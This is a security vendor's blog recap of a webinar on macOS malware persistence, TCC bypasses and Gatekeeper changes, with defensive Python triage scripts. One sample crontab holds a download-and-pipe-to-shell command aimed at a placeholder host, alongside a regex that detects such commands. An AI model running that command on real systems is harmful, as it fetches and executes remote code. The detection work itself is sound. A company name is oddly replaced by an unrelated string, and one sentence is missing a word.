
Say Hello to Mac Malware: A Tradecraft Tuesday Recap


Yes, Windows devices are still very much a business favorite, but the adoption of macOS devices has been steadily ticking upward. Threat actors have noticed.

More macOS malware variants have cropped up over the years, ranging from frustrating adware (like Adload) to insidious spyware (like LightSpy). The LockBit ransomware group has even dabbled with .

Apple has taken several steps over the years to build security measures into its platform, including Gatekeeper and the Transparency, Consent and Control (TCC) framework. These features help end users better manage access to their sensitive data and can help detect malware lurking on their systems, but threat actors are also continually fine-tuning their attacks to get around them.

In our recent April Tradecraft Tuesday episode, Stuart Ashenbrenner, 杏吧传媒 macOS researcher (and our designated Mac Guy), and Patrick Wardle, founder of DoubleYou and Objective-See, got together to dig into the security protections that Apple has employed for macOS, and how threat actors are responding to these measures by attempting to bypass them. Below are some of the key takeaways from the episode.


Malware persistence on macOS...well, persists

Malware authors continue to employ persistence mechanisms for macOS, but those techniques have sometimes changed over time, particularly in response to some of Apple's built-in security features.

First, a quick primer on persistence: threat actors use various techniques to maintain persistent access on devices, even after they've been rebooted. You may be aware of the persistence techniques used by malware targeting Windows devices, but macOS and Windows devices use very different services and background processes. That means that instead of using Windows services or the registry for persistence, macOS malware relies on macOS-specific mechanisms.

These have most typically been Launch Items, including Launch Daemons, which are property list (plist) files in various locations on disk that launchd executes at the system level, and Launch Agents, which require a user session and execute specific binaries defined in their plists.

For malware analysts and security researchers, persistence provides a good detection mechanism for malware, because unlike initial access vectors, which vary widely from vulnerability exploitation to compromised credentials, there are a more limited number of persistence methods available.
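Because the set of Launch Item locations is small and well known, an analyst can inventory them and triage each plist for the properties that matter (what it runs, whether it runs at load or is kept alive, and whether the binary lives somewhere an installer would not normally put it). The following is an added example written for this recap, not code from the episode or from any tool discussed in it; the sample plist, the directory list and the "suspect prefix" heuristics are constructed for illustration.

```python
import os
import plistlib
from typing import Any

# Standard Launch Item directories on macOS. The user-level path is expanded
# for the current user; on a real host you would expand it for every user.
LAUNCH_DIRS = [
    "/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    "~/Library/LaunchAgents",
]

# Locations from which legitimate installers rarely run a persistent binary
# (heuristic chosen for this example, not an authoritative list).
SUSPECT_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")

# Constructed sample: the kind of LaunchAgent a dropper might write to
# ~/Library/LaunchAgents. Nothing here refers to a real family.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Users/Shared/.hidden/updater</string><string>--silent</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

# Constructed benign counterpart: a scheduled job run from a normal location.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>Program</key><string>/usr/local/bin/backup</string>
  <key>StartCalendarInterval</key><dict><key>Hour</key><integer>3</integer></dict>
</dict></plist>"""


def triage_launch_item(raw: bytes, path: str) -> dict[str, Any]:
    """Parse one LaunchAgent/LaunchDaemon plist (XML or binary, plistlib handles
    both) and summarise what it runs, when it runs, and what deserves attention."""
    plist = plistlib.loads(raw)
    # launchd accepts either Program (a path) or ProgramArguments (an argv list).
    argv = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    program = argv[0] if argv else ""
    label = plist.get("Label", "")
    findings: list[str] = []

    if plist.get("RunAtLoad"):
        findings.append("runs at load (survives reboot/login)")
    if plist.get("KeepAlive"):
        findings.append("KeepAlive set (relaunched if killed)")
    if "StartInterval" in plist or "StartCalendarInterval" in plist:
        findings.append("scheduled re-execution")
    if program.startswith(SUSPECT_PREFIXES):
        findings.append(f"program in a user-writable/temporary location: {program}")
    # A dot-directory anywhere in the path is a classic way to hide a payload.
    if any(part.startswith(".") for part in program.split("/")[1:]):
        findings.append("program path contains a hidden (dot) component")
    # The Label normally matches the file name; a mismatch is worth a look.
    expected = os.path.splitext(os.path.basename(path))[0]
    if label and expected and label != expected:
        findings.append(f"Label {label!r} does not match file name {expected!r}")

    return {"path": path, "label": label, "program": program, "argv": argv, "findings": findings}


def scan_launch_dirs(dirs: list[str] = LAUNCH_DIRS) -> list[dict[str, Any]]:
    """Triage every .plist under the Launch Item directories that exist on this host."""
    results = []
    for d in dirs:
        d = os.path.expanduser(d)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            full = os.path.join(d, name)
            try:
                with open(full, "rb") as fh:
                    results.append(triage_launch_item(fh.read(), full))
            except (OSError, plistlib.InvalidFileException) as exc:
                results.append({"path": full, "error": str(exc), "findings": []})
    return results


if __name__ == "__main__":
    # Offline demonstration on the constructed samples, then a live scan if on macOS.
    for raw, path in ((SAMPLE_PLIST, "/Users/alice/Library/LaunchAgents/com.example.updater.plist"),
                      (BENIGN_PLIST, "/Library/LaunchDaemons/com.example.backup.plist")):
        r = triage_launch_item(raw, path)
        print(r["path"], "->", r["program"], r["findings"])
    for r in scan_launch_dirs():
        if r["findings"]:
            print(r["path"], r["findings"])
```

The live scan only reads plists and never loads or unloads anything, so it is safe to run on a workstation during triage; treat the prefix list and the hidden-directory check as starting heuristics to be tuned against your own fleet's baseline rather than as verdicts.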


Apple has specifically tracked persistent items in macOS through Background Task Management (BTM), which was introduced in 2022 and keeps tabs on persistence items in a BTM database. BTM creates macOS alerts for end users if it detects persistent items, and these are also broadcast as endpoint security events to third-party security tools.

At the same time, however, malware authors are aware of built-in Apple features like BTM. In response, they are looking for ways to either skirt around persistence detection mechanisms or to build their attacks around them. We can see one example of this through a recent increase of threat actors using cron jobs, which can be used on Linux and macOS systems to schedule commands. BTM doesn't directly cover cron jobs if they are loaded in a certain way (via AdLoads), and we're seeing a resurgence of legacy adware using cron jobs via AdLoads as a way of persistence.
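Since BTM does not surface these cron entries, a defender has to look at the crontabs directly. This added example (written for this recap, not code from the episode or any product it mentions) parses a crontab listing of the kind `crontab -l` prints, separates schedule from command, and flags the traits an analyst cares about: running at every boot, beacon-like short intervals, hidden or user-writable binary paths, and download-and-pipe-to-shell commands. The crontab text is constructed, and `example.invalid` is a reserved placeholder domain.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab (what `crontab -l` might print for one user).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/local/bin/backup.sh --quiet
*/10 * * * * /Users/Shared/.cache/.u/run >/dev/null 2>&1
@reboot /bin/sh -c "curl -fsSL http://example.invalid/p | sh"
"""

# Heuristics chosen for this example, not an authoritative list.
SUSPECT_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
EVERY_N_MINUTES = re.compile(r"^\*/(\d+) \* \* \* \*$")
BEACON_THRESHOLD_MINUTES = 15


@dataclass
class CronEntry:
    schedule: str
    command: str
    findings: list[str] = field(default_factory=list)


def assess(schedule: str, command: str) -> list[str]:
    """Return the analyst-relevant observations for one crontab entry."""
    findings: list[str] = []
    if schedule == "@reboot":
        findings.append("runs at every boot (persistence without a Launch Item)")
    m = EVERY_N_MINUTES.match(schedule)
    if m and int(m.group(1)) <= BEACON_THRESHOLD_MINUTES:
        findings.append(f"high-frequency schedule (every {m.group(1)} minutes)")
    # Inspect every absolute path mentioned in the command line.
    for tok in command.split():
        if not tok.startswith("/"):
            continue
        if tok.startswith(SUSPECT_PREFIXES):
            findings.append(f"path in a user-writable/temporary location: {tok}")
        if any(part.startswith(".") for part in tok.split("/")[1:]):
            findings.append(f"path contains a hidden (dot) component: {tok}")
    if DOWNLOAD_EXEC.search(command):
        findings.append("downloads content and pipes it to a shell")
    if ">/dev/null" in command.replace(" ", ""):
        findings.append("output suppressed (low-severity on its own)")
    return findings


def parse_crontab(text: str) -> list[CronEntry]:
    """Split a crontab listing into entries, skipping comments and environment
    assignments, and attach findings to each entry."""
    entries: list[CronEntry] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue
        if line.startswith("@"):  # @reboot, @daily, ... : one schedule token
            schedule, _, command = line.partition(" ")
        else:                     # five schedule fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        command = command.strip()
        entries.append(CronEntry(schedule, command, assess(schedule, command)))
    return entries


if __name__ == "__main__":
    for e in parse_crontab(SAMPLE_CRONTAB):
        print(f"{e.schedule:14} {e.command}")
        for f in e.findings:
            print("    -", f)
```

On a real host, feed it the per-user crontabs (and `/etc/crontab` plus `/usr/lib/cron/tabs/` contents, which require elevated read access) rather than the constructed text; the thresholds and prefix list are deliberately simple and should be tuned against what legitimate automation on your fleet looks like.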

We're also seeing malware authors target apps or services that users regularly launch (such as replacing the Dock icon with their own malware). While this won't automatically run on reboot (and therefore isn't as consistent as something like a Launch Agent), it will still run if a user clicks on it, and because it isn't governed by BTM it helps threat actors sidestep detection.

Threat actors in some cases are even shying away from using persistence if their attacks don't necessarily need to use these types of techniques, which might be the case with certain infostealer or ransomware attacks.


TCC pain points: Alert inundation, bypasses, and more

TCC is Apple's database on disk for prompting users when an application tries to perform an action that requires their specific permission. TCC is behind the prompts that ask users if video collaboration software can access their devices' webcams or microphones, for example. After they give permission, the application is then given consent to carry out that action via System Settings.

TCC is a good idea from a security perspective, but its design and implementation have led to several user-experience problems. End users are often inundated with security alerts tied to various permissions, even for security tools that have been signed with Developer IDs and notarized by Apple (meaning that they have gone through a process where Apple examined them closely to determine they're not malware).


Another caveat of the TCC process, as we've previously discussed, is related to mobile device management (MDM) overrides. MDM providers can provision TCC permissions, which means that end users don't have to see all the TCC-related security prompts. However, these settings aren't reflected in the System Settings and instead end up living in the MDM binary property list (MDMOverrides.plist) rather than the TCC database (TCC.db). This can cause discrepancies between what the MDM is showing end users versus what the endpoint is showing them.
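One practical check that falls out of this split is to reconcile the two sources: what the MDM profile claims to have provisioned versus what the endpoint's TCC.db actually records. The following is an added example written for this recap, not code from the episode or from Apple. It builds an in-memory SQLite table that mirrors a subset of the real `access` table's columns (`client`, `service`, `auth_value`; in the real database `auth_value` 2 means allowed, 0 denied, 3 limited) and a simplified MDMOverrides-style plist keyed by client identifier then service name with an `Allowed` flag; the exact on-disk layout of MDMOverrides.plist is an assumption here, and all entries are constructed.

```python
import plistlib
import sqlite3

# auth_value encodings used in the access table of TCC.db.
DENIED, ALLOWED, LIMITED = 0, 2, 3


def build_sample_tcc_db() -> sqlite3.Connection:
    """Constructed stand-in for TCC.db: a subset of the real `access` columns.
    client is a bundle identifier (client_type 0) or an absolute path (client_type 1)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, auth_value INTEGER)")
    conn.executemany(
        "INSERT INTO access VALUES (?, ?, ?, ?)",
        [
            ("kTCCServiceSystemPolicyAllFiles", "com.example.edr", 0, ALLOWED),   # MDM-provisioned, present
            ("kTCCServiceScreenCapture", "com.example.meeting", 0, ALLOWED),     # user clicked Allow
            ("kTCCServiceMicrophone", "com.example.meeting", 0, DENIED),         # user clicked Don't Allow
        ],
    )
    conn.commit()
    return conn


# Constructed, simplified MDMOverrides-style content (layout is an assumption).
MDM_OVERRIDES_RAW = plistlib.dumps(
    {
        "com.example.edr": {
            "kTCCServiceSystemPolicyAllFiles": {"Allowed": True},
            "kTCCServiceAccessibility": {"Allowed": True},   # provisioned, but absent from TCC.db
        },
        "com.example.meeting": {
            "kTCCServiceMicrophone": {"Allowed": False},
        },
    },
    fmt=plistlib.FMT_BINARY,
)


def load_tcc_grants(conn: sqlite3.Connection) -> dict[tuple[str, str], int]:
    """Map (client, service) -> auth_value from the access table (read-only query)."""
    rows = conn.execute("SELECT client, service, auth_value FROM access").fetchall()
    return {(client, service): value for client, service, value in rows}


def load_mdm_overrides(raw: bytes) -> dict[tuple[str, str], bool]:
    """Map (client, service) -> Allowed flag from an MDMOverrides-style plist."""
    data = plistlib.loads(raw)
    out: dict[tuple[str, str], bool] = {}
    for client, services in data.items():
        for service, entry in services.items():
            out[(client, service)] = bool(entry.get("Allowed", False))
    return out


def reconcile(tcc: dict[tuple[str, str], int], mdm: dict[tuple[str, str], bool]) -> list[tuple[tuple[str, str], str]]:
    """List every (client, service) where the MDM view and the endpoint's TCC.db disagree."""
    report: list[tuple[tuple[str, str], str]] = []
    for key, allowed in mdm.items():
        local = tcc.get(key)
        if allowed and local != ALLOWED:
            report.append((key, "allowed by MDM profile but not recorded as allowed in TCC.db"))
        elif not allowed and local == ALLOWED:
            report.append((key, "denied by MDM profile but TCC.db records a user grant"))
    for key, value in tcc.items():
        if key not in mdm and value == ALLOWED:
            report.append((key, "granted locally (user prompt), no MDM override covers it"))
    return sorted(report)


if __name__ == "__main__":
    conn = build_sample_tcc_db()
    for (client, service), note in reconcile(load_tcc_grants(conn), load_mdm_overrides(MDM_OVERRIDES_RAW)):
        print(f"{client:22} {service:34} {note}")
```

Against a real endpoint the same `reconcile` function can be pointed at a copy of the system TCC.db (reading it requires Full Disk Access for the tool doing the reading) and the device's MDMOverrides.plist; the output is exactly the list of permissions that will look different in the MDM console and in System Settings.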

There are also many ways for threat actors to get around TCC, as we've seen through the many disclosures of macOS vulnerabilities in Apple's security updates. For instance, XCSSET, macOS malware that was uncovered a few years ago and has various capabilities (from stealing victims' app information to taking screenshots), was previously found exploiting CVE-2021-30713, a vulnerability allowing threat actors to bypass the TCC framework.


TCC endpoint security events and Gatekeeper changes

In Apple's newest operating system release, Apple added TCC-related events to its endpoint security framework. Endpoint security is Apple's process for monitoring system events for potentially malicious activity, released in macOS 10.15. The framework sends notification events after a new process has been spawned, but also delivers authorization events before an action takes place (which allows security tools to inspect processes in case they want to prevent it).

As of macOS 15.4, endpoint security is now alerted of TCC prompts (via the ES_EVENT_TYPE_NOTIFY_TCC_MODIFY identifier), giving third-party security tools better visibility into TCC permissions that have been modified or changed. These events are currently reactive, meaning that notifications happen after they occur, but the more proactive authorization event functionality, which could allow security tools to inspect permissions before they're granted, has not yet been built in.


Still, this development helps crack down on macOS malware that tries to bypass TCC through bombarding users with TCC prompts or masquerading as legitimate software. Previously, we've seen malware authors play on the fact that end users can be tricked into granting permissions via TCC alerts (particularly if they're inundated with so many alerts).

Apple has also made tweaks to Gatekeeper, its technology that double-checks whether apps contain known malware or whether developer signing certificates have been revoked. One previous issue impacting Gatekeeper was that macOS users could easily sidestep this security feature by right-clicking or through the "Open Anyway" option in System Settings in order to execute potentially malicious applications. Threat actors behind macOS malware like the Shlayer adware dropper have used this weakness in their attacks.

However, more recently Apple has tweaked Gatekeeper's functionality, so if macOS users download a piece of software that's not signed, they are warned that Apple can't verify that it's free of malware and are only given two options if they either attempt to right-click or visit System Settings: a "Done" option to do nothing or a "Move to Trash" option.

These examples show Apple's ongoing attempts to improve its security features in order to make them more difficult for threat actors to bypass in attacks.


Understanding macOS malware: Growth and trends

Generally, as technology becomes more prolific, threat actors take notice of that, and we're seeing that with macOS as Macs become more common in the enterprise. While macOS malware has seemed to dramatically increase year-over-year, tracking specific numbers that point to this growth is difficult, especially because as researchers write new detections, we inherently start to see more.


However, we do see some overarching trends that are indicative of how more threat actors are targeting macOS platforms overall. For example, threat actors in some cases are porting their malware that's been written for Windows or Linux platforms to macOS (either via cross-platform frameworks or by rewriting the malware natively for macOS).

We're also seeing a rise in living-off-the-land techniques specifically focused on macOS. Infostealers like Poseidon are abusing the AppleScript framework, a scripting language that offers the capability to automate tasks, to simulate prompts that mimic native Apple prompts, with the goal of stealing end user credentials.

At the end of the day, threat actors continue to look for new ways to target macOS platforms and skirt around Apple's built-in security protections. There are many ways to secure your Mac, like using third-party tools and keeping your OS and applications up to date.

For more details about macOS malware trends and to better understand the impacts of Apple's new TCC events support in endpoint security, watch the full version of our April Tradecraft Tuesday episode!

